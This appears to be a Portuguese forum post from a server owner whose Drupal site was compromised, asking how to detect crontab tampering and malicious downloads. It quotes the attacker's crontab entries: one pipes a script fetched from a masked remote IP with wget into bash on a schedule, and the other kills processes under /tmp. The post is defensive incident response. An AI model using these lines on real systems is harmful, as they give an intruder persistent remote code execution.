Meu servidor web foi invadido e, depois de não ser capaz de dizer qual executável estava em execução, perguntei como detectar o nome do arquivo, sobre o qual perguntei anteriormente em Como posso diagnosticar um processo que não possui um nome de arquivo executável associado com isso?
Depois de matar o processo, fiquei imaginando como ele retornou e, depois de verificar o crontab, descobri isso.
* * * * * ps aux | grep /tmp | egrep -v systemd | awk '{print $2}' | xargs -t kill -9
16 2,20 * * * wget -O - http://xxx.xxx.xxx.xxx:xxxx/_somefile.jpg | bash -s
Eu suspeito que o hack foi através destas vulnerabilidades núcleo Drupal - altamente crítico - Execução Remota de Código - SA-CORE-2018 -002 e núcleo Drupal - altamente crítico - Execução Remota de Código - SA-CORE-2018-004 . Eu estava rodando o servidor web como um processo php-fpm usando uma conta não privilegiada, e presumo que essa é a razão pela qual o hack não poderia causar mais danos (talvez não tenha sido projetado dessa forma). Os arquivos do servidor web também estão sob controle git e pareciam bem.
Eu pretendo transferir os arquivos do servidor da web para um novo servidor, mas não posso ter certeza se os arquivos podem não conter a vulnerabilidade oculta em algum lugar. Então as principais perguntas são:
Como posso monitorar ou rastrear uma tentativa de modificar os usuários crontab
em tempo real?
Como faço para detectar a chamada wget
para atualizar e executar o executável?
é se eu instalá-los, como posso detectar uma tentativa de alterar o arquivo crontab
.
PS. Em relação à questão vinculada, foi assim que encontrei o nome do executável.
adminx@gw06 ~ ls -l /proc/10160/exe
lrwxrwxrwx 1 adminx adminx 0 Jun 3 09:22 /proc/10160/exe -> /dev/shm/apache (deleted)
Eu também suspeito que o endereço IP e a porta do servidor de malware podem ter sido o destino do meu servidor apenas nos horários especificados, porque quando tentei wget
o arquivo não aconteceu. Às 15:03, nada parece ter acontecido, embora o crontab
ainda esteja em vigor.
Tags security monitoring malware trace